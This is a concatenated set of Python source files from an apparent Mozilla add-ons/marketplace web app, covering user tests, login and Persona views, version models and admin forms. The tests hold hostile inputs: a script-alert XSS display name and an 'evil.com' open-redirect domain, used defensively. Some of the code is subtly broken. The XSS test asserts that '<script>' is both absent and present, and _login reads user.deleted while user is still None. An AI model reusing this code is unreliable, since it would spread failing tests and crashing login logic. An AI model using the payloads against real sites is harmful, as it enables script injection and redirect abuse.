assert len(un) and not un.startswith('.+'), 'Unexpected: %s' % un
@mock.patch.object(settings, 'MAX_GEN_USERNAME_TRIES', 3)
@fudge.patch('users.utils.UserProfile.objects.filter')
def test_too_many_tries(self, filter):
filter = (filter.is_callable().returns_fake().provides('count')
.returns(1))
for i in range(3):
# Simulate existing username.
filter = filter.next_call().returns(1)
# Simulate available username.
filter = filter.next_call().returns(0)
# After the third try, give up, and generate a random string username.
un = autocreate_username('base')
assert not un.startswith('base'), 'Unexpected: %s' % un
@fudge.patch('users.utils.UserProfile.objects.filter')
def test_duplicate_username_counter(self, filter):
filter = (filter.expects_call().returns_fake().expects('count')
.returns(1).next_call().returns(1).next_call().returns(0))
eq_(autocreate_username('existingname'), 'existingname3')
########NEW FILE########
__FILENAME__ = test_views
import json
from nose.tools import eq_
from waffle import helpers # NOQA
import amo
import amo.tests
from amo.helpers import urlparams
from amo.pyquery_wrapper import PyQuery as pq
from amo.urlresolvers import reverse
from users.models import UserProfile
class UserViewBase(amo.tests.TestCase):
fixtures = ['users/test_backends']
def setUp(self):
self.client = amo.tests.TestClient()
self.client.get('/')
self.user = UserProfile.objects.get(id='4043307')
def get_profile(self):
return UserProfile.objects.get(id=self.user.id)
class TestAjax(UserViewBase):
def setUp(self):
super(TestAjax, self).setUp()
self.client.login(username='[email protected]', password='foo')
def test_ajax_404(self):
r = self.client.get(reverse('users.ajax'), follow=True)
eq_(r.status_code, 404)
def test_ajax_success(self):
r = self.client.get(reverse('users.ajax'), {'q': '[email protected]'},
follow=True)
data = json.loads(r.content)
eq_(data, {'status': 1, 'message': '', 'id': 9945,
'name': u'Justin Scott \u0627\u0644\u062a\u0637\u0628'})
def test_ajax_xss(self):
self.user.display_name = '<script>alert("xss")</script>'
self.user.save()
assert '<script>' in self.user.display_name, (
'Expected <script> to be in display name')
r = self.client.get(reverse('users.ajax'),
{'q': self.user.email, 'dev': 0})
assert '<script>' not in r.content
assert '<script>' in r.content
def test_ajax_failure_incorrect_email_mkt(self):
r = self.client.get(reverse('users.ajax'), {'q': 'incorrect'},
follow=True)
data = json.loads(r.content)
eq_(data,
{'status': 0,
'message': 'A user with that email address does not exist, or the'
' user has not yet accepted the developer agreement.'})
def test_ajax_failure_no_email(self):
r = self.client.get(reverse('users.ajax'), {'q': ''}, follow=True)
data = json.loads(r.content)
eq_(data,
{'status': 0,
'message': 'An email address is required.'})
def test_forbidden(self):
self.client.logout()
r = self.client.get(reverse('users.ajax'))
eq_(r.status_code, 401)
class TestLogout(UserViewBase):
def test_success(self):
user = UserProfile.objects.get(email='[email protected]')
self.client.login(username=user.email, password='foo')
r = self.client.get('/', follow=True)
eq_(pq(r.content.decode('utf-8'))('.account .user').text(),
user.display_name)
eq_(pq(r.content)('.account .user').attr('title'), user.email)
r = self.client.get('/users/logout', follow=True)
assert not pq(r.content)('.account .user')
def test_redirect(self):
self.client.login(username='[email protected]', password='foo')
self.client.get('/', follow=True)
url = '/en-US/about'
r = self.client.get(urlparams(reverse('users.logout'), to=url),
follow=True)
self.assertRedirects(r, url, status_code=302)
# Test a valid domain. Note that assertRedirects doesn't work on
# external domains
url = urlparams(reverse('users.logout'), to='/addon/new',
domain='builder')
r = self.client.get(url, follow=True)
to, code = r.redirect_chain[0]
self.assertEqual(to, 'https://builder.addons.mozilla.org/addon/new')
self.assertEqual(code, 302)
# Test an invalid domain
url = urlparams(reverse('users.logout'), to='/en-US/about',
domain='http://evil.com')
r = self.client.get(url, follow=True)
self.assertRedirects(r, '/en-US/about', status_code=302)
########NEW FILE########
__FILENAME__ = utils
import uuid
from functools import partial
from django.conf import settings
import commonware.log
from users.models import UserProfile
log = commonware.log.getLogger('z.users')
def get_task_user():
"""
Returns a user object. This user is suitable for assigning to
cron jobs or long running tasks.
"""
return UserProfile.objects.get(pk=settings.TASK_USER_ID)
def autocreate_username(candidate, tries=1):
"""Returns a unique valid username."""
max_tries = settings.MAX_GEN_USERNAME_TRIES
from amo.utils import slugify, SLUG_OK
make_u = partial(slugify, ok=SLUG_OK, lower=True, spaces=False,
delimiter='-')
adjusted_u = make_u(candidate)
if tries > 1:
adjusted_u = '%s%s' % (adjusted_u, tries)
if (adjusted_u == '' or tries > max_tries or len(adjusted_u) > 255):
log.info('username empty, max tries reached, or too long;'
' username=%s; max=%s' % (adjusted_u, max_tries))
return autocreate_username(uuid.uuid4().hex[0:15])
if UserProfile.objects.filter(username=adjusted_u).count():
return autocreate_username(candidate, tries=tries + 1)
return adjusted_u
########NEW FILE########
__FILENAME__ = views
import functools
from django import http
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.views import login as auth_login
from django.db import transaction
from django.shortcuts import get_object_or_404, render
from django.utils.http import is_safe_url
from django.views.decorators.csrf import csrf_exempt
import commonware.log
from django_browserid import get_audience, verify
from django_statsd.clients import statsd
from tower import ugettext as _
import amo
from access.middleware import ACLMiddleware
from addons.decorators import addon_view_factory
from addons.models import Addon
from amo import messages
from amo.decorators import json_view, login_required, post_required
from amo.urlresolvers import get_url_prefix
from amo.utils import escape_all, log_cef
from lib.metrics import record_action
from .models import UserProfile
from .signals import logged_out
from .utils import autocreate_username
log = commonware.log.getLogger('z.users')
addon_view = addon_view_factory(qs=Addon.objects.valid)
def user_view(f):
@functools.wraps(f)
def wrapper(request, user_id, *args, **kw):
"""Provides a user object given a user ID or username."""
if user_id.isdigit():
key = 'id'
else:
key = 'username'
# If the username is `me` then show the current user's profile.
if (user_id == 'me' and request.amo_user and
request.amo_user.username):
user_id = request.amo_user.username
user = get_object_or_404(UserProfile, **{key: user_id})
return f(request, user, *args, **kw)
return wrapper
@login_required(redirect=False)
@json_view
def ajax(request):
"""Query for a user matching a given email."""
if 'q' not in request.GET:
raise http.Http404()
data = {'status': 0, 'message': ''}
email = request.GET.get('q', '').strip()
dev_only = request.GET.get('dev', '1')
try:
dev_only = int(dev_only)
except ValueError:
dev_only = 1
if not email:
data.update(message=_('An email address is required.'))
return data
user = UserProfile.objects.filter(email=email)
if dev_only:
user = user.exclude(read_dev_agreement=None)
msg = _('A user with that email address does not exist.')
msg_dev = _('A user with that email address does not exist, or the user '
'has not yet accepted the developer agreement.')
if user:
data.update(status=1, id=user[0].id, name=user[0].name)
else:
data['message'] = msg_dev if dev_only else msg
return escape_all(data)
def _clean_next_url(request):
gets = request.GET.copy()
url = gets.get('to', settings.LOGIN_REDIRECT_URL)
if not is_safe_url(url, host=request.get_host()):
log.info(u'Unsafe redirect to %s' % url)
url = settings.LOGIN_REDIRECT_URL
domain = gets.get('domain', None)
if domain in settings.VALID_LOGIN_REDIRECTS.keys():
url = settings.VALID_LOGIN_REDIRECTS[domain] + url
gets['to'] = url
request.GET = gets
return request
def browserid_authenticate(request, assertion, is_mobile=False,
browserid_audience=get_audience):
"""
Verify a BrowserID login attempt. If the BrowserID assertion is
good, but no account exists, create one.
"""
url = settings.BROWSERID_VERIFICATION_URL
# We must always force the Firefox OS identity provider. This is because
# we are sometimes allowing unverified assertions and you can't mix that
# feature with bridged IdPs. See bug 910938.
extra_params = {}
if settings.UNVERIFIED_ISSUER:
extra_params['experimental_forceIssuer'] = settings.UNVERIFIED_ISSUER
if is_mobile:
# When persona is running in a mobile OS then we can allow unverified
# assertions.
url = settings.NATIVE_BROWSERID_VERIFICATION_URL
extra_params['experimental_allowUnverified'] = 'true'
log.debug('Verifying Persona at %s, audience: %s, '
'extra_params: %s' % (url, browserid_audience, extra_params))
result = verify(assertion, browserid_audience,
url=url, extra_params=extra_params)
if not result:
return None, _('Persona authentication failure.')
if 'unverified-email' in result:
email = result['unverified-email']
verified = False
else:
email = result['email']
verified = True
try:
profile = UserProfile.objects.filter(email=email)[0]
except IndexError:
profile = None
if profile:
if profile.is_verified and not verified:
# An attempt to log in to a verified address with an unverified
# assertion is a very bad thing. Don't let that happen.
log.debug('Verified user %s attempted to log in with an '
'unverified assertion!' % profile)
return None, _('Please use the verified email for this account.')
else:
profile.is_verified = verified
profile.save()
return profile, None
username = autocreate_username(email.partition('@')[0])
source = amo.LOGIN_SOURCE_MMO_BROWSERID
profile = UserProfile.objects.create(username=username, email=email,
source=source, display_name=username,
is_verified=verified)
log_cef('New Account', 5, request, username=username,
signature='AUTHNOTICE',
msg='User created a new account (from Persona)')
record_action('new-user', request)
return profile, None
@csrf_exempt
@post_required
@transaction.commit_on_success
#@ratelimit(block=True, rate=settings.LOGIN_RATELIMIT_ALL_USERS)
def browserid_login(request, browserid_audience=None):
msg = ''
if request.user.is_authenticated():
# If username is different, maybe sign in as new user?
return http.HttpResponse(status=200)
try:
is_mobile = bool(int(request.POST.get('is_mobile', 0)))
except ValueError:
is_mobile = False
with statsd.timer('auth.browserid.verify'):
profile, msg = browserid_authenticate(
request, request.POST.get('assertion'),
is_mobile=is_mobile,
browserid_audience=browserid_audience or get_audience(request))
if profile is not None:
auth.login(request, profile)
profile.log_login_attempt(True)
return http.HttpResponse(status=200)
return http.HttpResponse(msg, status=401)
# Used by mkt.developers.views:login.
def _login(request, template=None, data=None, dont_redirect=False):
data = data or {}
data['webapp'] = settings.APP_PREVIEW
# In case we need it later. See below.
get_copy = request.GET.copy()
if 'to' in request.GET:
request = _clean_next_url(request)
if request.user.is_authenticated():
return http.HttpResponseRedirect(
request.GET.get('to', settings.LOGIN_REDIRECT_URL))
user = None
login_status = None
r = auth_login(request, template_name=template, redirect_field_name='to',
extra_context=data)
if isinstance(r, http.HttpResponseRedirect):
# Django's auth.views.login has security checks to prevent someone from
# redirecting to another domain. Since we want to allow this in
# certain cases, we have to make a new response object here to replace
# the above.
if 'domain' in request.GET:
request.GET = get_copy
request = _clean_next_url(request)
r = http.HttpResponseRedirect(request.GET['to'])
# Succsesful log in according to django. Now we do our checks. I do
# the checks here instead of the form's clean() because I want to use
# the messages framework and it's not available in the request there.
if user.deleted:
logout(request)
log.warning(u'Attempt to log in with deleted account (%s)' % user)
messages.error(request, _('Wrong email address or password!'))
user.log_login_attempt(False)
log_cef('Authentication Failure', 5, request,
username=request.user, signature='AUTHFAIL',
msg='Account is deactivated')
return render(request, template, data)
login_status = True
if dont_redirect:
# We're recalling the middleware to re-initialize amo_user
ACLMiddleware().process_request(request)
r = render(request, template, data)
if login_status is not None:
user.log_login_attempt(login_status)
log_cef('Authentication Failure', 5, request,
username=request.POST['username'],
signature='AUTHFAIL',
msg='The password was incorrect')
return r
def logout(request):
user = request.user
if not user.is_anonymous():
log.debug(u"User (%s) logged out" % user)
auth.logout(request)
if 'to' in request.GET:
request = _clean_next_url(request)
next = request.GET.get('to')
if not next:
next = settings.LOGOUT_REDIRECT_URL
prefixer = get_url_prefix()
if prefixer:
next = prefixer.fix(next)
response = http.HttpResponseRedirect(next)
# Fire logged out signal.
logged_out.send(None, request=request, response=response)
return response
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from .models import License, Version
class LicenseAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'builtin', 'url')
list_filter = ('builtin',)
ordering = ('builtin',)
admin.site.register(License, LicenseAdmin)
admin.site.register(Version)
########NEW FILE########
__FILENAME__ = compare
import re
from django.utils.encoding import smart_str
MAXVERSION = 2 ** 63 - 1
version_re = re.compile(r"""(?P<major>\d+|\*) # major (x in x.y)
\.?(?P<minor1>\d+|\*)? # minor1 (y in x.y)
\.?(?P<minor2>\d+|\*)? # minor2 (z in x.y.z)
\.?(?P<minor3>\d+|\*)? # minor3 (w in x.y.z.w)
(?P<alpha>[a|b]?) # alpha/beta
(?P<alpha_ver>\d*) # alpha/beta version
(?P<pre>pre)? # pre release
(?P<pre_ver>\d)? # pre release version
""",
re.VERBOSE)
def dict_from_int(version_int):
"""Converts a version integer into a dictionary with major/minor/...
info."""
d = {}
rem = version_int
(rem, d['pre_ver']) = divmod(rem, 100)
(rem, d['pre']) = divmod(rem, 10)
(rem, d['alpha_ver']) = divmod(rem, 100)
(rem, d['alpha']) = divmod(rem, 10)
(rem, d['minor3']) = divmod(rem, 100)
(rem, d['minor2']) = divmod(rem, 100)
(rem, d['minor1']) = divmod(rem, 100)
(rem, d['major']) = divmod(rem, 100)
d['pre'] = None if d['pre'] else 'pre'
d['alpha'] = {0: 'a', 1: 'b'}.get(d['alpha'])
return d
def num(vint):
return '{major}.{minor1}.{minor2}.{minor3}'.format(**dict_from_int(vint))
def version_dict(version):
"""Turn a version string into a dict with major/minor/... info."""
match = version_re.match(version or '')
letters = 'alpha pre'.split()
numbers = 'major minor1 minor2 minor3 alpha_ver pre_ver'.split()
if match:
d = match.groupdict()
for letter in letters:
d[letter] = d[letter] if d[letter] else None
for num in numbers:
if d[num] == '*':
d[num] = 99
else:
d[num] = int(d[num]) if d[num] else None
else:
d = dict((k, None) for k in numbers)
d.update((k, None) for k in letters)
return d
def version_int(version):
d = version_dict(smart_str(version))
for key in ['alpha_ver', 'major', 'minor1', 'minor2', 'minor3',
'pre_ver']:
if not d[key]:
d[key] = 0
atrans = {'a': 0, 'b': 1}
d['alpha'] = atrans.get(d['alpha'], 2)
d['pre'] = 0 if d['pre'] else 1
v = "%d%02d%02d%02d%d%02d%d%02d" % (d['major'], d['minor1'],
d['minor2'], d['minor3'], d['alpha'], d['alpha_ver'], d['pre'],
d['pre_ver'])
return min(int(v), MAXVERSION)
########NEW FILE########
__FILENAME__ = models
# -*- coding: utf-8 -*-
import datetime
import json
import os
import django.dispatch
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.storage import default_storage as storage
from django.db import models
import caching.base
import commonware.log
import jinja2
import addons.query
import amo
import amo.models
import amo.utils
from amo.decorators import use_master
from amo.urlresolvers import reverse
from applications.models import Application, AppVersion
from files import utils
from files.models import cleanup_file, File, Platform
from translations.fields import (LinkifiedField, PurifiedField, save_signal,
TranslatedField)
from versions.tasks import update_supported_locales_single
from .compare import version_dict, version_int
log = commonware.log.getLogger('z.versions')
class VersionManager(amo.models.ManagerBase):
def __init__(self, include_deleted=False):
amo.models.ManagerBase.__init__(self)
self.include_deleted = include_deleted
def get_query_set(self):
qs = super(VersionManager, self).get_query_set()
qs = qs._clone(klass=addons.query.IndexQuerySet)
if not self.include_deleted:
qs = qs.exclude(deleted=True)
return qs.transform(Version.transformer)
class Version(amo.models.ModelBase):
addon = models.ForeignKey('addons.Addon', related_name='versions')
license = models.ForeignKey('License', null=True)
releasenotes = PurifiedField()
approvalnotes = models.TextField(default='', null=True)
version = models.CharField(max_length=255, default='0.1')
version_int = models.BigIntegerField(null=True, editable=False)
nomination = models.DateTimeField(null=True)
reviewed = models.DateTimeField(null=True)
has_info_request = models.BooleanField(default=False)
has_editor_comment = models.BooleanField(default=False)
deleted = models.BooleanField(default=False)
supported_locales = models.CharField(max_length=255)
_developer_name = models.CharField(max_length=255, default='',
editable=False)
objects = VersionManager()
with_deleted = VersionManager(include_deleted=True)
class Meta(amo.models.ModelBase.Meta):
db_table = 'versions'
ordering = ['-created', '-modified']
def __init__(self, *args, **kwargs):
super(Version, self).__init__(*args, **kwargs)
self.__dict__.update(version_dict(self.version or ''))
def __unicode__(self):
return jinja2.escape(self.version)
def save(self, *args, **kw):
if not self.version_int and self.version:
v_int = version_int(self.version)
# Magic number warning, this is the maximum size
# of a big int in MySQL to prevent version_int overflow, for
# people who have rather crazy version numbers.
# http://dev.mysql.com/doc/refman/5.5/en/numeric-types.html
if v_int < 9223372036854775807:
self.version_int = v_int
else:
log.error('No version_int written for version %s, %s' %
(self.pk, self.version))
creating = not self.id
super(Version, self).save(*args, **kw)
if creating:
# To avoid circular import.
from mkt.webapps.models import AppFeatures
AppFeatures.objects.create(version=self)
return self
@classmethod
def from_upload(cls, upload, addon, platforms, send_signal=True):
data = utils.parse_addon(upload, addon)
try:
license = addon.versions.latest().license_id
except Version.DoesNotExist:
license = None
max_len = cls._meta.get_field_by_name('_developer_name')[0].max_length
developer = data.get('developer_name', '')[:max_len]
v = cls.objects.create(addon=addon, version=data['version'],
license_id=license, _developer_name=developer)
log.info('New version: %r (%s) from %r' % (v, v.id, upload))
AV = ApplicationsVersions
for app in data.get('apps', []):
AV(version=v, min=app.min, max=app.max,
application_id=app.id).save()
platforms = [Platform.objects.get(id=amo.PLATFORM_ALL.id)]
# To avoid circular import.
from mkt.webapps.models import AppManifest
# Note: This must happen before we call `File.from_upload`.
manifest = utils.WebAppParser().get_json_data(upload)
AppManifest.objects.create(
version=v, manifest=json.dumps(manifest))
for platform in platforms:
File.from_upload(upload, v, platform, parse_data=data)
# Update supported locales from manifest.
# Note: This needs to happen after we call `File.from_upload`.
update_supported_locales_single.apply_async(
args=[addon.id], kwargs={'latest': True},
eta=datetime.datetime.now() +
datetime.timedelta(seconds=settings.NFS_LAG_DELAY))
v.disable_old_files()
# After the upload has been copied to all platforms, remove the upload.
storage.delete(upload.path)
if send_signal:
version_uploaded.send(sender=v)
# If packaged app and app is blocked, put in escalation queue.
if addon.is_packaged and addon.status == amo.STATUS_BLOCKED:
# To avoid circular import.
from editors.models import EscalationQueue
EscalationQueue.objects.create(addon=addon)
return v
@property
def path_prefix(self):
return os.path.join(settings.ADDONS_PATH, str(self.addon_id))
def license_url(self, impala=False):
return reverse('addons.license', args=[self.addon.slug, self.version])
def flush_urls(self):
return self.addon.flush_urls()
def delete(self):
log.info(u'Version deleted: %r (%s)' % (self, self.id))
amo.log(amo.LOG.DELETE_VERSION, self.addon, str(self.version))
self.update(deleted=True)
# Set file status to disabled.
f = self.all_files[0]
f.update(status=amo.STATUS_DISABLED, _signal=False)
f.hide_disabled_file()
if self.addon.is_packaged:
# Unlink signed packages if packaged app.
storage.delete(f.signed_file_path)
log.info(u'Unlinked file: %s' % f.signed_file_path)
storage.delete(f.signed_reviewer_file_path)
log.info(u'Unlinked file: %s' % f.signed_reviewer_file_path)
@amo.cached_property(writable=True)
def all_activity(self):
from devhub.models import VersionLog # yucky
al = (VersionLog.objects.filter(version=self.id).order_by('created')
.select_related(depth=1).no_cache())
return al
@amo.cached_property(writable=True)
def compatible_apps(self):
"""Get a mapping of {APP: ApplicationVersion}."""
avs = self.apps.select_related(depth=1)
return self._compat_map(avs)
@amo.cached_property(writable=True)
def all_files(self):
"""Shortcut for list(self.files.all()). Heavily cached."""
return list(self.files.all())
@amo.cached_property
def supported_platforms(self):
"""Get a list of supported platform names."""
return list(set(amo.PLATFORMS[f.platform_id] for f in self.all_files))
@property
def status(self):
status_choices = amo.MKT_STATUS_FILE_CHOICES
if self.deleted:
return [status_choices[amo.STATUS_DELETED]]
else:
return [status_choices[f.status] for f in self.all_files]
@property
def statuses(self):
"""Unadulterated statuses, good for an API."""
return [(f.id, f.status) for f in self.all_files]
def is_public(self):
# To be public, a version must not be deleted, must belong to a public
# addon, and all its attached files must have public status.
try:
return (not self.deleted and self.addon.is_public() and
all(f.status == amo.STATUS_PUBLIC for f in self.all_files))
except ObjectDoesNotExist:
return False
@property
def has_files(self):
return bool(self.all_files)
@classmethod
def _compat_map(cls, avs):
apps = {}
for av in avs:
app_id = av.application_id
if app_id in amo.APP_IDS:
apps[amo.APP_IDS[app_id]] = av
return apps
@classmethod
def transformer(cls, versions):
"""Attach all the compatible apps and files to the versions."""
ids = set(v.id for v in versions)
if not versions:
return
# FIXME: find out why we have no_cache() here and try to remove it.
avs = (ApplicationsVersions.objects.filter(version__in=ids)
.select_related(depth=1).no_cache())
files = File.objects.filter(version__in=ids).no_cache()
def rollup(xs):
groups = amo.utils.sorted_groupby(xs, 'version_id')
return dict((k, list(vs)) for k, vs in groups)
av_dict, file_dict = rollup(avs), rollup(files)
for version in versions:
v_id = version.id
version.compatible_apps = cls._compat_map(av_dict.get(v_id, []))
version.all_files = file_dict.get(v_id, [])
for f in version.all_files:
f.version = version
@classmethod
def transformer_activity(cls, versions):
"""Attach all the activity to the versions."""
from devhub.models import VersionLog # yucky
ids = set(v.id for v in versions)
if not versions:
return
al = (VersionLog.objects.filter(version__in=ids).order_by('created')
.select_related(depth=1).no_cache())
def rollup(xs):
groups = amo.utils.sorted_groupby(xs, 'version_id')
return dict((k, list(vs)) for k, vs in groups)
al_dict = rollup(al)
for version in versions:
v_id = version.id
version.all_activity = al_dict.get(v_id, [])
def disable_old_files(self):
if not self.files.filter(status=amo.STATUS_BETA).exists():
qs = File.objects.filter(version__addon=self.addon_id,
version__lt=self.id,
version__deleted=False,
status__in=[amo.STATUS_UNREVIEWED,
amo.STATUS_PENDING])
# Use File.update so signals are triggered.
for f in qs:
f.update(status=amo.STATUS_DISABLED)
@property
def developer_name(self):
return self._developer_name
@amo.cached_property(writable=True)
def is_privileged(self):
"""
Return whether the corresponding addon is privileged by looking at
the manifest file.
This is a cached property, to avoid going in the manifest more than
once for a given instance. It's also directly writable do allow you to
bypass the manifest fetching if you *know* your app is privileged or
not already and want to pass the instance to some code that will use
that property.
"""
if not self.addon.is_packaged or not self.all_files:
return False
data = self.addon.get_manifest_json(file_obj=self.all_files[0])
return data.get('type') == 'privileged'
@amo.cached_property
def manifest(self):
# To avoid circular import.
from mkt.webapps.models import AppManifest
try:
manifest = self.manifest_json.manifest
except AppManifest.DoesNotExist:
manifest = None
return json.loads(manifest) if manifest else {}
@use_master
def update_status(sender, instance, **kw):
if not kw.get('raw'):
try:
instance.addon.reload()
instance.addon.update_status()
instance.addon.update_version()
except models.ObjectDoesNotExist:
log.info('Got ObjectDoesNotExist processing Version change signal',
exc_info=True)
pass
def inherit_nomination(sender, instance, **kw):
"""Inherit nomination date for new packaged app versions."""
if kw.get('raw'):
return
addon = instance.addon
if addon.is_packaged:
# If prior version's file is pending, inherit nomination. Otherwise,
# set nomination to now.
last_ver = (Version.objects.filter(addon=addon)
.exclude(pk=instance.pk)
.order_by('-nomination'))
if (last_ver.exists() and
last_ver[0].all_files[0].status == amo.STATUS_PENDING):
instance.update(nomination=last_ver[0].nomination, _signal=False)
log.debug('[Webapp:%s] Inheriting nomination from prior pending '
'version' % addon.id)
elif (addon.status in amo.WEBAPPS_APPROVED_STATUSES and
not instance.nomination):
log.debug('[Webapp:%s] Setting nomination date to now for new '
'version.' % addon.id)
instance.update(nomination=datetime.datetime.now(), _signal=False)
def cleanup_version(sender, instance, **kw):
"""On delete of the version object call the file delete and signals."""
if kw.get('raw'):
return
for file_ in instance.files.all():
cleanup_file(file_.__class__, file_)
version_uploaded = django.dispatch.Signal()
models.signals.pre_save.connect(
save_signal, sender=Version, dispatch_uid='version_translations')
models.signals.post_save.connect(
update_status, sender=Version, dispatch_uid='version_update_status')
models.signals.post_save.connect(
inherit_nomination, sender=Version,
dispatch_uid='version_inherit_nomination')
models.signals.post_delete.connect(
update_status, sender=Version, dispatch_uid='version_update_status')
models.signals.pre_delete.connect(
cleanup_version, sender=Version, dispatch_uid='cleanup_version')
class LicenseManager(amo.models.ManagerBase):
def builtins(self):
return self.filter(builtin__gt=0).order_by('builtin')
class License(amo.models.ModelBase):
OTHER = 0
name = TranslatedField(db_column='name')
url = models.URLField(null=True)
builtin = models.PositiveIntegerField(default=OTHER)
text = LinkifiedField()
on_form = models.BooleanField(default=False,
help_text='Is this a license choice in the devhub?')
some_rights = models.BooleanField(default=False,
help_text='Show "Some Rights Reserved" instead of the license name?')
icons = models.CharField(max_length=255, null=True,
help_text='Space-separated list of icon identifiers.')
objects = LicenseManager()
class Meta:
db_table = 'licenses'
def __unicode__(self):
return unicode(self.name)
models.signals.pre_save.connect(
save_signal, sender=License, dispatch_uid='version_translations')
class ApplicationsVersions(caching.base.CachingMixin, models.Model):
application = models.ForeignKey(Application)
version = models.ForeignKey(Version, related_name='apps')
min = models.ForeignKey(AppVersion, db_column='min',
related_name='min_set')
max = models.ForeignKey(AppVersion, db_column='max',
related_name='max_set')
objects = caching.base.CachingManager()
class Meta:
db_table = u'applications_versions'
unique_together = (('application', 'version'),)
def __unicode__(self):
return u'%s %s - %s' % (self.application, self.min, self.max)
########NEW FILE########
__FILENAME__ = tasks
import logging
from celeryutils import task
from amo.decorators import write
log = logging.getLogger('z.task')
@task
@write
def update_supported_locales_single(id, latest=False, **kw):
"""
Update supported_locales for an individual app. Set latest=True to use the
latest current version instead of the most recent public version.
"""
from mkt.webapps.models import Webapp
try:
app = Webapp.objects.get(pk=id)
except Webapp.DoesNotExist:
log.info(u'[Webapp:%s] Did not find webapp to update supported '
u'locales.' % id)
return
try:
if app.update_supported_locales(latest=latest):
log.info(u'[Webapp:%s] Updated supported locales.' % app.id)
except Exception:
log.info(u'[Webapp%s] Updating supported locales failed.' % app.id,
exc_info=True)
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from . import models
admin.site.register(models.Config)
admin.site.disable_action('delete_selected')
admin.site.register(models.DownloadSource)
########NEW FILE########
__FILENAME__ = decorators
import functools
from django.core.exceptions import PermissionDenied
from access.acl import action_allowed
from amo.decorators import login_required
def admin_required(reviewers=False):
"""
Admin, or someone with AdminTools:View, required.
If reviewers=True ReviewerAdminTools:View is allowed also.
"""
def decorator(f):
@login_required
@functools.wraps(f)
def wrapper(request, *args, **kw):
admin = (action_allowed(request, 'Admin', '%') or
action_allowed(request, 'AdminTools', 'View'))
if reviewers == True:
admin = (
admin or
action_allowed(request, 'ReviewerAdminTools', 'View'))
if admin:
return f(request, *args, **kw)
raise PermissionDenied
return wrapper
# If decorator has no args, and is "paren-less", it's callable.
if callable(reviewers):
return decorator(reviewers)
else:
return decorator
########NEW FILE########
__FILENAME__ = forms
from django import forms
from django.conf import settings
from django.forms import ModelForm
from django.forms.models import modelformset_factory
import commonware.log
import happyforms
from quieter_formset.formset import BaseModelFormSet
from addons.models import Addon
from files.models import File
LOGGER_NAME = 'z.zadmin'
log = commonware.log.getLogger(LOGGER_NAME)
class DevMailerForm(happyforms.Form):
_choices = [('eula',
'Developers who have set up EULAs for active add-ons'),
('sdk', 'Developers of active SDK add-ons'),
('apps', 'Developers of active apps (not add-ons)'),
('free_apps_region_enabled',
'Developers of free apps and new region enabled'),
('free_apps_region_disabled',
'Developers of free apps with new regions disabled'),
('payments',
'Developers of non-deleted apps (not add-ons) with payments'),
('payments_region_enabled',
'Developers of apps with payments and new regions enabled'),
('payments_region_disabled',
'Developers of apps with payments and new regions disabled'),
('desktop_apps',
'Developers of non-deleted apps supported on desktop'),
('all_extensions', 'All extension developers')]
recipients = forms.ChoiceField(choices=_choices, required=True)
subject = forms.CharField(widget=forms.TextInput(attrs=dict(size='100')),
required=True)
preview_only = forms.BooleanField(initial=True, required=False,
label=u'Log emails instead of sending')
message = forms.CharField(widget=forms.Textarea, required=True)
class AddonStatusForm(ModelForm):
class Meta:
model = Addon
fields = ('status', 'highest_status', 'outstanding')
class FileStatusForm(ModelForm):
class Meta:
model = File
fields = ('status',)
FileFormSet = modelformset_factory(File, form=FileStatusForm,
formset=BaseModelFormSet, extra=0)
class YesImSure(happyforms.Form):
yes = forms.BooleanField(required=True, label="Yes, I'm sure")
class GenerateErrorForm(happyforms.Form):
error = forms.ChoiceField(choices=(
['zerodivisionerror', 'Zero Division Error (will email)'],
['iorequesterror', 'IORequest Error (no email)'],
['heka_statsd', 'Heka statsd message'],
['heka_json', 'Heka JSON message'],
['heka_cef', 'Heka CEF message'],
['heka_sentry', 'Heka Sentry message'],
['amo_cef', 'AMO CEF message'],
))
def explode(self):
error = self.cleaned_data.get('error')
if error == 'zerodivisionerror':
1 / 0
elif error == 'iorequesterror':
class IOError(Exception):
pass
raise IOError('request data read error')
elif error == 'heka_cef':
environ = {'REMOTE_ADDR': '127.0.0.1', 'HTTP_HOST': '127.0.0.1',
'PATH_INFO': '/', 'REQUEST_METHOD': 'GET',
'HTTP_USER_AGENT': 'MySuperBrowser'}
config = {'cef.version': '0',
'cef.vendor': 'Mozilla',
'cef.device_version': '3',
'cef.product': 'zamboni',
'cef': True}
settings.HEKA.cef('xx\nx|xx\rx', 5, environ, config,
username='me', ext1='ok=ok', ext2='ok\\ok',
logger_info='settings.HEKA')
elif error == 'heka_statsd':
settings.HEKA.incr(name=LOGGER_NAME)
elif error == 'heka_json':
settings.HEKA.heka(type="heka_json",
fields={'foo': 'bar', 'secret': 42,
'logger_type': 'settings.HEKA'})
elif error == 'heka_sentry':
# These are local variables only used
# by Sentry's frame hacking magic.
# They won't be referenced which may trigger flake8
# errors.
heka_conf = settings.HEKA_CONF # NOQA
active_heka_conf = settings.HEKA._config # NOQA
try:
1 / 0
except:
settings.HEKA.raven('heka_sentry error triggered')
elif error == 'amo_cef':
from amo.utils import log_cef
env = {'REMOTE_ADDR': '127.0.0.1', 'HTTP_HOST': '127.0.0.1',
'PATH_INFO': '/', 'REQUEST_METHOD': 'GET',
'HTTP_USER_AGENT': 'MySuperBrowser'}
log_cef(settings.STATSD_PREFIX, 6, env)
class PriceTiersForm(happyforms.Form):
prices = forms.FileField()
########NEW FILE########
__FILENAME__ = models
import json
from django.conf import settings
from django.db import models
from django.utils.functional import memoize
import amo
import amo.models
_config_cache = {}
class Config(models.Model):
"""Sitewide settings."""
key = models.CharField(max_length=255, primary_key=True)
value = models.TextField()
class Meta:
db_table = u'config'
@property
def json(self):
try:
return json.loads(self.value)
except (TypeError, ValueError):
return {}
def unmemoized_get_config(conf):
try:
c = Config.objects.get(key=conf)
return c.value
except Config.DoesNotExist:
return
get_config = memoize(unmemoized_get_config, _config_cache, 1)
def set_config(conf, value):
cf, created = Config.objects.get_or_create(key=conf)
cf.value = value
cf.save()
_config_cache.clear()
class EmailPreviewTopic(object):
"""Store emails in a given topic so an admin can preview before
re-sending.
A topic is a unique string identifier that groups together preview emails.
If you pass in an object (a Model instance) you will get a poor man's
foreign key as your topic.
For example, EmailPreviewTopic(addon) will link all preview emails to
the ID of that addon object.
"""
def __init__(self, object=None, suffix='', topic=None):
if not topic:
assert object, 'object keyword is required when topic is empty'
